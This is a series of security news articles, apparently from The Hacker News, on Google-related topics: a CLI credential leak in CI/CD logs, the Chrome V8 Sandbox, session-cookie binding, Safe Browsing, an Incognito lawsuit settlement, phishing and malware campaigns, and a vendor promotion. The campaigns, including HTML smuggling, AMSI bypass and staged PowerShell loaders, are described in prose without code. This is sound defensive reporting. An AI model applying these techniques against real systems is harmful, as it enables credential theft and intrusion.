Apr 16, 2024NewsroomCloud Security / DevSecOps

New cybersecurity research has found that command-line interface (CLI) tools from Amazon Web Services (AWS) and Google Cloud can expose sensitive credentials in build logs, posing significant risks to organizations.

The vulnerability has been codenamed LeakyCLI by cloud security firm Orca.

“Some commands on Azure CLI, AWS CLI, and Google Cloud CLI can expose sensitive information in the form of environment variables, which can be collected by adversaries when published by tools such as GitHub Actions,” security researcher Roi Nisimi said in a report shared with The Hacker News.

Microsoft has since addressed the issue as part of security updates released in November 2023, assigned it the CVE identifier CVE-2023-36052 (CVSS score: 8.6).

The idea, in a nutshell, has to do with how the CLI commands such as could be used to show (pre-)defined environment variables and output to Continuous Integration and Continuous Deployment (CI/CD) logs. A list of such commands spanning AWS and Google Cloud is below 0

• aws lambda get-function-configuration
• aws lambda get-function
• aws lambda update-function-configuration
• aws lambda update-function-code
• aws lambda publish-version
• gcloud functions deploy <func> –set-env-vars
• gcloud functions deploy <func> –update-env-vars
• gcloud functions deploy <func> –remove-env-vars

Orca said it found several projects on GitHub that inadvertently leaked access tokens and other sensitive data via Github Actions, CircleCI, TravisCI, and Cloud Build logs.

Unlike Microsoft, however, both Amazon and Google consider this to be expected behavior, requiring that organizations take steps to avoid storing secrets in environment variables and instead use a dedicated secrets store service like AWS Secrets Manager or Google Cloud Secret Manager.

Google also recommends the use of the “–no-user-output-enabled” option to suppress the printing of command output to standard output and standard error in the terminal.

“If bad actors get their hands on these environment variables, this could potentially lead to view sensitive information including credentials, such as passwords, user names, and keys, which could allow them to access any resources that the repository owners can,” Nisimi said.

“CLI commands are by default assumed to be running in a secure environment, but coupled with CI/CD pipelines, they may pose a security threat.”

Apr 08, 2024NewsroomSoftware Security / Cybersecurity

Google has announced support for what’s called a V8 Sandbox in the Chrome web browser in an effort to address memory corruption issues.

The sandbox, according to V8 Security technical lead Samuel Groß, aims to prevent “memory corruption in V8 from spreading within the host process.”

The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox for the JavaScript and WebAssembly engine that’s designed to mitigate common V8 vulnerabilities.

The idea is to limit the impact of V8 vulnerabilities by restricting the code executed by V8 to a subset of the process’ virtual address space (“the sandbox”) and isolating it from the rest of the process.

Shortcomings affecting V8 have accounted for a significant chunk of the zero-day vulnerabilities that Google has addressed between 2021 and 2023, with as many as 16 security flaws discovered over the time period.

“The sandbox assumes that an attacker can arbitrarily and concurrently modify any memory inside the sandbox address space as this primitive can be constructed from typical V8 vulnerabilities,” the Chromium team said.

“Further, it is assumed that an attacker will be able to read memory outside of the sandbox, for example, through hardware side channels. The sandbox then aims to protect the rest of the process from such an attacker. As such, any corruption of memory outside of the sandbox address space is considered a sandbox violation.”

Groß emphasized the challenges with tackling V8 vulnerabilities by switching to a memory-safe language like Rust or hardware memory safety approaches, such as memory tagging, given the “subtle logic issues” that can be exploited to corrupt memory, unlike classic memory safety bugs like use-after-frees, out-of-bounds accesses, and others.

“Nearly all vulnerabilities found and exploited in V8 today have one thing in common: the eventual memory corruption necessarily happens inside the V8 heap because the compiler and runtime (almost) exclusively operate on V8 HeapObject instances,” Groß said.

Given that these issues cannot be protected by the same techniques used for typical memory-corruption vulnerabilities, the V8 Sandbox is designed to isolate V8’s heap memory such that should any memory corruption occur, it cannot escape the security confines to other parts of the process’ memory.

This is accomplished by replacing all data types that can access out-of-sandbox memory with “sandbox-compatible” alternatives, thereby effectively preventing an attacker from accessing other memory. The sandbox can be enabled by setting “v8_enable_sandbox” to true in the gn args.

Benchmark results from Speedometer and JetStream show that the security feature adds an overhead of about 1% on typical workloads, allowing it to be enabled by default starting with Chrome version 123, spanning Android, ChromeOS, Linux, macOS, and Windows.

“The V8 Sandbox requires a 64-bit system as it needs to reserve a large amount of virtual address space, currently one terabyte,” Groß said.

“The sandbox is motivated by the fact that current memory safety technologies are largely inapplicable to optimizing JavaScript engines. While these technologies fail to prevent memory corruption in V8 itself, they can in fact protect the V8 Sandbox attack surface. The sandbox is therefore a necessary step towards memory safety.”

The development comes as Google highlighted the role by Kernel Address Sanitizer (KASan) in detecting memory bugs in native code and help harden Android firmware security, adding it used the compiler-based tool for discovering more than 40 bugs.

“Using KASan enabled builds during testing and/or fuzzing can help catch memory corruption vulnerabilities and stability issues before they land on user devices,” Eugene Rodionov and Ivan Lozano from the Android team said.

Apr 08, 2024NewsroomInvestment Scam / Mobile Security

Google has filed a lawsuit against two app developers for engaging in an “international online consumer investment fraud scheme” that tricked users into downloading bogus Android apps from the Google Play Store and other sources and stealing their funds under the guise of promising higher returns.

The individuals in question are Yunfeng Sun (aka Alphonse Sun) and Hongnam Cheung (aka Zhang Hongnim or Stanford Fischer), who are believed to be based in Shenzhen and Hong Kong, respectively.

The defendants are said to have uploaded about 87 crypto apps to the Play Store to pull off the social engineering scam since at least 2019, with over 100,000 users downloading them and leading to substantial financial losses.

“The gains conveyed by the apps were illusory,” the tech giant said in its complaint. “And the scheme did not end there.”

“Instead, when individual victims attempted to withdraw their balances, defendants and their confederates would double down on the scheme by requesting various fees and other payments from victims that were supposedly necessary for the victims to recover their principal investments and purported gains.”

While this kind of scam is typically referred to as pig butchering (aka shā zhū pán), Google said it “neither adopts nor endorses the use of this term.” It’s derived from the idea that victims are fattened up like hogs with the promise of lucrative returns before “slaughtering” them for their assets.

In September 2023, the U.S. Financial Crimes Enforcement Network (FinCEN) said these scams are perpetrated by criminal enterprises based in Southeast Asia that employ hundreds of thousands of people who are trafficked to the region by promising them high-paying jobs.

The fraudulent scheme entails the scammers using elaborate fictitious personas to target unsuspecting individuals via social media or dating platforms, enticing them with the prospect of a romantic relationship to build trust and convince them to invest in cryptocurrency portfolios that purport to offer high profits within a short span of time with an aim to steal their funds.

To create the appearance of legitimacy, the financially motivated actors are known to fabricate websites and mobile apps to display a bogus investment portfolio with large returns.

Sun and Cheung, said Google, lured victim investors to download their fraudulent apps through text messages using Google Voice to target victims in the U.S. and Canada. Other distribution methods include affiliate marketing campaigns that offer commissions for “signing up additional users” and YouTube videos promoting the fake investment platforms.

The company described the malicious activity as persistent and continuing, with the defendants “using varying computer network infrastructure and accounts to obfuscate their identities, and making material misrepresentations to Google in the process.”

It also accused them of violating the Racketeer Influenced and Corrupt Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play App Signing Terms of Service, Developer Program Policies, YouTube’s Community Guidelines, as well as the Google Voice Acceptable Use Policy.

“Google Play can continue to be an app-distribution platform that users want to use only if users feel confident in the integrity of the apps,” Google added. “By using Google Play to conduct their fraud scheme, defendants have threatened the integrity of Google Play and the user experience.”

It’s worth noting that the problem is not limited to the Android ecosystem alone, as prior reports show that such bogus apps have also repeatedly made their way to the Apple App Store.

The development is the latest in a series of legal actions that Google has taken to avoid the misuse of its products. In November 2023, the company sued multiple individuals in India and Vietnam for distributing fake versions of its Bard AI chatbot (now rebranded as Gemini) to propagate malware via Facebook.

Apr 03, 2024NewsroomBrowser Security / Session Hijacking

Google on Tuesday said it’s piloting a new feature in Chrome called Device Bound Session Credentials (DBSC) to help protect users against session cookie theft by malware.

The prototype – currently tested against “some” Google Account users running Chrome Beta – is built with an aim to make it an open web standard, the tech giant’s Chromium team said.

“By binding authentication sessions to the device, DBSC aims to disrupt the cookie theft industry since exfiltrating these cookies will no longer have any value,” the company noted.

“We think this will substantially reduce the success rate of cookie theft malware. Attackers would be forced to act locally on the device, which makes on-device detection and cleanup more effective, both for anti-virus software as well as for enterprise managed devices.”

The development comes on the back of reports that off-the-shelf information stealing malware are finding ways to steal cookies in a manner that allows threat actors to bypass multi-factor authentication (MFA) protection and gain unauthorized access to online accounts.

Such session hijacking techniques are not new. In October 2021, Google’s Threat Analysis Group (TAG) detailed a phishing campaign that targeted YouTube content creators with cookie stealing malware to hijack their accounts and monetize the access for perpetrating cryptocurrency scams.

Earlier this January, CloudSEK revealed that information stealers like Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake have updated their capabilities to hijack user sessions and allow continuous access to Google services even after a password reset.

Google told The Hacker News at the time that “attacks involving malware that steal cookies and tokens are not new; we routinely upgrade our defenses against such techniques and to secure users who fall victim to malware.”

It further recommended users to enable Enhanced Safe Browsing in the Chrome web browser to protect against phishing and malware downloads.

DBSC aims to cut down on such malicious efforts by introducing a cryptographic approach that ties together the sessions to the device such that it makes it harder for the adversaries to abuse the stolen cookies and hijack the accounts.

Offered via an API, the new feature achieves this by allowing a server to associate a session with a public key created by the browser as part of a public/private key pair when a new session is launched.

It’s worth noting that the key pair is stored locally on the device using Trusted Platform Modules (TPMs). In addition, the DBSCI API permits the server to verify proof-of-possession of the private key throughout the session lifetime to ensure the session is active on the same device.

“DBSC offers an API for websites to control the lifetime of such keys, behind the abstraction of a session, and a protocol for periodically and automatically proving possession of those keys to the website’s servers,” Google’s Kristian Monsen and Arnar Birgisson said.

“There is a separate key for each session, and it should not be possible to detect that two different session keys are from one device. By device-binding the private key and with appropriate intervals of the proofs, the browser can limit malware’s ability to offload its abuse off of the user’s device, significantly increasing the chance that either the browser or server can detect and mitigate cookie theft.”

One crucial caveat is that DBSC banks on user devices having a secure way of signing challenges while protecting private keys from exfiltration by malware, necessitating that the web browser has access to the TPM.

Google said support for DBSC will be initially rolled out to roughly half of Chrome’s desktop users based on the hardware capabilities of their machines. The latest project is also expected to be in sync with the company’s broader plans to sunset third-party cookies in the browser by the end of the year via the Privacy Sandbox initiative.

“This is to make sure that DBSC does not become a new tracking vector once third-party cookies are phased out, while also ensuring that such cookies can be fully protected in the meantime,” it said. “If the user completely opts out of cookies, third-party cookies, or cookies for a specific site, this will disable DBSC in those scenarios as well.”

The company further noted that it’s engaging with several server providers, identity providers (IdPs), and browser vendors like Microsoft Edge and Okta, who have expressed interest in DBSC. Origin trials for DBSC for all supported websites are set to commence by the end of the year.

Apr 02, 2024NewsroomBrowser Security / Data Security

Google has agreed to purge billions of data records reflecting users’ browsing activities to settle a class action lawsuit that claimed the search giant tracked them without their knowledge or consent in its Chrome browser.

The class action, filed in 2020, alleged the company misled users by tracking their internet browsing activity who thought that it remained private when using the “incognito” or “private” mode on web browsers like Chrome.

In late December 2023, it emerged that the company had consented to settle the lawsuit. The deal is currently pending approval by the U.S. District Judge Yvonne Gonzalez Rogers.

“The settlement provides broad relief regardless of any challenges presented by Google’s limited record keeping,” a court filing on April 1, 2024, said.

“Much of the private browsing data in these logs will be deleted in their entirety, including billions of event level data records that reflect class members’ private browsing activities.”

As part of the data remediation process, Google is also required to delete information that makes private browsing data identifiable by redacting data points like IP addresses, generalizing User-Agent strings, and remove detailed URLs within a specific website (i.e., retain only domain-level portion of the URL).

In addition, it has been asked to delete the so-called X-Client-Data header field, which Google described as a Chrome-Variations header that captures the “state of the installation of Chrome itself, including active variations, as well as server-side experiments that may affect the installation.”

This header is generated from a randomized seed value, making it potentially unique enough to identify specific Chrome users.

Other settlement terms require Google to block third-party cookies within Chrome’s Incognito Mode for five years, a setting the company has already implemented for all users. The tech company has separately announced plans to eliminate tracking cookies by default by the end of the year.

Google has since updated the wording of Incognito Mode in January 2024 to clarify that the setting will not change “how data is collected by websites you visit and the services they use, including Google.”

The lawsuit extracted admissions from Google employees that characterized the browser’s Incognito browsing mode as a “confusing mess,” “effectively a lie,” and a “problem of professional ethics and basic honesty.”

It further laid bare internal exchanges in which executives argued Incognito Mode shouldn’t be called “private” because it risked “exacerbating known misconceptions.”

The development comes as Google said it has started automatically blocking bulk senders in Gmail that don’t meet its Email sender guidelines in an attempt to cut down on spam and phishing attacks.

The new requirements make it mandatory for email senders who push out more than 5,000 messages per day to Gmail accounts to provide a one-click unsubscribe option and respond to unsubscription requests within two days.

Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.

“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.

The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with an intent to collect sensitive data for selling them in underground forums.

AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It’s typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.

Once installed, it’s capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.

The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.

HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by “smuggling” an encoded malicious script.

Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and extracts the payload on the host device, effectively bypassing typical security controls such as email gateways that are known to only inspect for suspicious attachments.

The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.

The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement, launching which kicks off a series of actions to execute a series of intermediate batch and PowerShell scripts from an already compromised domain.

One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.

“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Michael Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”

“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”

The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.

AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.

Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.

“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.

In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.

That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.

Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of the remote access trojans like AsyncRAT, njRAT, and Remcos.

Mar 15, 2024NewsroomBrowser Security / Phishing Attack

Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites.

“The Standard protection mode for Chrome on desktop and iOS will check sites against Google’s server-side list of known bad sites in real-time,” Google’s Jonathan Li and Jasika Bawa said.

“If we suspect a site poses a risk to you or your device, you’ll see a warning with more information. By checking sites in real time, we expect to block 25% more phishing attempts.”

Up until now, the Chrome browser used a locally-stored list of known unsafe sites that’s updated every 30 to 60 minutes, and then leveraging a hash-based approach to compare every site visited against the database.

Google first revealed its plans to switch to real-time server-side checks without sharing users’ browsing history with the company in September 2023.

The reason for the change, the search giant said, is motivated by the fact that the list of harmful websites is growing at a rapid pace and that 60% of the phishing domains exist for less than 10 minutes, making it difficult to block.

“Not all devices have the resources necessary to maintain this growing list, nor are they always able to receive and apply updates to the list at the frequency necessary to benefit from full protection,” it added.

Thus, with the new architecture, every time a user attempts to visit a website, the URL is checked against the browser’s global and local caches containing known safe URLs and the results of previous Safe Browsing checks in order to determine the site’s status.

Should the visited URL be absent from the caches, a real-time check is performed by obfuscating the URL into 32-byte full hashes, which are then truncated into 4-byte long hash prefixes, encrypted, and sent to a privacy server.

“The privacy server removes potential user identifiers and forwards the encrypted hash prefixes to the Safe Browsing server via a TLS connection that mixes requests with many other Chrome users,” Google explained.

The Safe Browsing server subsequently decrypts the hash prefixes and matches them against the server-side database to return full hashes of all unsafe URLs that match one of the hash prefixes sent by the browser.

Finally, on the client side, the full hashes are compared against the full hashes of the visited URL, and a warning message is displayed if a match is found.

Google also confirmed that the privacy server is nothing but an Oblivious HTTP (OHTTP) relay operated by Fastly that sits between Chrome and the Safe Browsing server to prevent the latter from access users’ IP addresses, thereby preventing it from correlating the URL checks with a user’s internet browsing history.

“Ultimately, Safe Browsing sees the hash prefixes of your URL but not your IP address, and the privacy server sees your IP address but not the hash prefixes,” the company emphasized. “No single party has access to both your identity and the hash prefixes. As such, your browsing activity remains private.”

Mar 07, 2024NewsroomMalware / Network Security

Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.

“The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.

The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.

They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.

The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.

“A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files,” the researchers said.

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.

It’s said to be active from at least late 2022, targeting Asian countries like China, Hong Kong, Japan, and Singapore, among others. That said, it’s currently not known how the malware is distributed in the wild.

“When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files.”

It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activities intensifying post mid-2023.

“TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others.”

Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.

Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.

Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.

Mar 06, 2024The Hacker NewsData Security / Cloud Security

Every Google Workspace administrator knows how quickly Google Drive becomes a messy sprawl of loosely shared confidential information. This isn’t anyone’s fault; it’s inevitable as your productivity suite is purposefully designed to enable real-time collaboration – both internally and externally.

For Security & Risk Management teams, the untenable risk of any Google Drive footprint lies in the toxic combinations of sensitive data, excessive permissions, and improper sharing. However, it can be challenging to differentiate between typical business practices and potential risks without fully understanding the context and intent.

Material Security, a company renowned for its innovative method of protecting sensitive data within employee mailboxes, has recently launched Data Protection for Google Drive to safeguard the sprawl of confidential information scattered throughout Google Drive with a powerful discovery and remediation toolkit.

How Material Security helps organizations safeguard Google Drive

Trying to answer fundamental questions about what’s in Google Drive and where it’s shared is painstakingly manual using the Workspace admin dashboard, and working with the Drive API is costly and complex. Given the breadth of sensitive content, this is an area that warrants focus, but it’s challenging to get to the depth required.

Material is backed by a powerful data platform that syncs with your Google Workspace tenant to build out a structured model of historical file contents, metadata, permissions, and sharing settings that is kept up-to-date based on ongoing activity. This data platform enables in-depth inspection that wouldn’t be possible by interfacing with the Drive API alone. With this data platform as the foundation, Material:

• Scans file contents against a set of custom built ML-based detection rules to identify and classify sensitive content across a wide range of PII, PCI, PHI, and other confidential data categories
• Calculates file and folder permission sets and sharing settings to build a unified access model that is easier to understand and demonstrate for compliance
• Enables automated access revocation based on precise search results and activity triggers to continuously reduce the risk profile

The precision of Material allows you to effectively wrangle such a complex and vast data repository without getting in the way of daily use – security without impacting productivity. See it for yourself.

Illuminate blind spots across your Google Drive footprint

With a powerful data platform as the foundation, you gain an expressive search interface that guides you through your Google Drive footprint to identify toxic combinations worthy of investigation. You can search against file metadata, ownership, content, location, and sharing to answer questions such as:

• Show me every file that contains financial records that are shared externally
• Show me every file viewable via a public link that contains PII
• Show me every file accessible by these users who are departing the company next week
• Show me every file with confidential information that’s shared with a gmail address
• Show me every file in a Shared Drive that contains health records

As you illuminate more of those dangerous blind spots, you continuously gain a more complete view of the environment with heightened security posture – the types of things that make it easier to sleep at night.

Block exfiltration paths with automated remediation

The primary remediation mode to fix toxic combinations in Google Drive is to revoke access. That sounds easy on the surface, but when you consider the conditions of the whole space, it becomes a multi-dimensional puzzle. When is external sharing valid and when is it not? Are there users that belong to groups that they shouldn’t? Which settings should change when a document is modified to add confidential information?

Precise search and activity-based filtering enables remediation workflows for scenarios such as:

• Automatically revoking public links for any file that contains classified information
• Sending users a message to confirm external sharing when files contain any sensitive data
• Cutting off access to all files shared with specific external domains in a single bulk job
• Revoking all access to a specific account that displays behaviors of a compromise
• Resetting any files accessible to the organization that contain personal health information to Restricted

Applying automation generally can get in the way of day-to-day use, so it’s important to build with precision – a better understanding of the nature of content, which domains are trusted, and common user behaviors help you contain the surface area the right way.

Keep your productivity suite productive with Material Security

At Material, we focus our efforts on the productivity suite because we believe that it’s critical infrastructure to any organization. And as critical infrastructure, in-depth security defenses that can effectively stop attacks and reduce risk across the environment are paramount.

The new capabilities with Data Protection for Google Drive solve hard data discovery, governance, and access problems that have traditionally been challenging to do without dedicated tooling.

Want to see it for yourself? Schedule a personal demo with our team today.

Cybersecurity researchers are warning about a spike in email phishing campaigns that are weaponizing the Google Cloud Run service to deliver various banking trojans such as Astaroth (aka Guildma), Mekotio, and Ousaban (aka Javali) to targets across Latin America (LATAM) and Europe.

“The infection chains associated with these malware families feature the use of malicious Microsoft Installers (MSIs) that function as droppers or downloaders for the final malware payload(s),” Cisco Talos researchers disclosed last week.

The high-volume malware distribution campaigns, observed since September 2023, have employed the same storage bucket within Google Cloud for propagation, suggesting potential links between the threat actors behind the distribution campaigns.

Google Cloud Run is a managed compute platform that enables users to run frontend and backend services, batch jobs, deploy websites and applications, and queue processing workloads without having to manage or scale the infrastructure.

“Adversaries may view Google Cloud Run as an inexpensive, yet effective way to deploy distribution infrastructure on platforms that most organizations likely do not prevent internal systems from accessing,” the researchers said.

A majority of the systems used to send phishing messages originate from Brazil, followed by the U.S., Russia, Mexico, Argentina, Ecuador, South Africa, France, Spain, and Bangladesh. The emails bear themes related to invoices or financial and tax documents, in some cases purporting to be from local government tax agencies.

Embedded within these messages are links to a website hosted on run[.]app, resulting in the delivery of a ZIP archive containing a malicious MSI file either directly or via 302 redirects to a Google Cloud Storage location, where the installer is stored.

The threat actors have also been observed attempting to evade detection using geofencing tricks by redirecting visitors to these URLs to a legitimate site like Google when accessing them with a U.S. IP address.

Besides leveraging the same infrastructure to deliver both Mekotio and Astaroth, the infection chain associated with the latter acts as a conduit to distribute Ousaban.

Astaroth, Mekotio, and Ousaban are all designed to single out financial institutions, keeping tabs on users’ web browsing activity as well as logging keystrokes and taking screenshots should one of the target bank websites be open.

Ousaban has a history of weaponizing cloud services to its advantage, having previously employed Amazon S3 and Microsoft Azure to download second-stage payloads, and Google Docs to retrieve command-and-control (C2) configuration.

The development comes amid phishing campaigns propagating malware families such as DCRat, Remcos RAT, and DarkVNC that are capable of harvesting sensitive data and taking control of compromised hosts.

It also follows an uptick in threat actors deploying QR codes in phishing and email-based attacks (aka quishing) to trick potential victims into installing malware on their mobile devices.

“In a separate attack, the adversaries sent targets spear-phishing emails with malicious QR codes pointing to fake Microsoft Office 365 login pages that eventually steal the user’s login credentials when entered,” Talos said.

“QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after.”

Phishing campaigns have also set their eyes on the oil and gas sector to deploy an information stealer called Rhadamanthys, which has currently reached version 0.6.0, highlighting a steady stream of patches and updates by its developers.

“The campaign starts with a phishing email using a vehicle incident report to lure victims into interacting with an embedded link that abuses an open redirect on a legitimate domain, primarily Google Maps or Google Images,” Cofense said.

Users who click on the link are then redirected to a website hosting a bogus PDF file, which, in reality, is a clickable image that contacts a GitHub repository and downloads a ZIP archive containing the stealer executable.

“Once a victim attempts to interact with the executable, the malware will unpack and start a connection with a command-and-control (C2) location that collects any stolen credentials, cryptocurrency wallets, or other sensitive information,” the company added.

Other campaigns have abused email marketing tools like Twilio’s SendGrid to obtain client mailing lists and take advantage of stolen credentials to send out convincing-looking phishing emails, per Kaspersky.

“What makes this campaign particularly insidious is that the phishing emails bypass traditional security measures,” the Russian cybersecurity company noted. “Since they are sent through a legitimate service and contain no obvious signs of phishing, they may evade detection by automatic filters.”

These phishing activities are further fueled by the easy availability of phishing kits such as Greatness and Tycoon, which have become a cost-effective and scalable means for aspiring cyber criminals to mount malicious campaigns.

“Tycoon Group [phishing-as-a-service] is sold and marketed on Telegram for as low as $120,” Trustwave SpiderLabs researcher Rodel Mendrez said last week, noting the service first came into being around August 2023.

“Its key selling features include the ability to bypass Microsoft two-factor authentication, achieve ‘link speed at the highest level,’ and leveraging Cloudflare to evade antibot measures, ensuring the persistence of undetected phishing links.”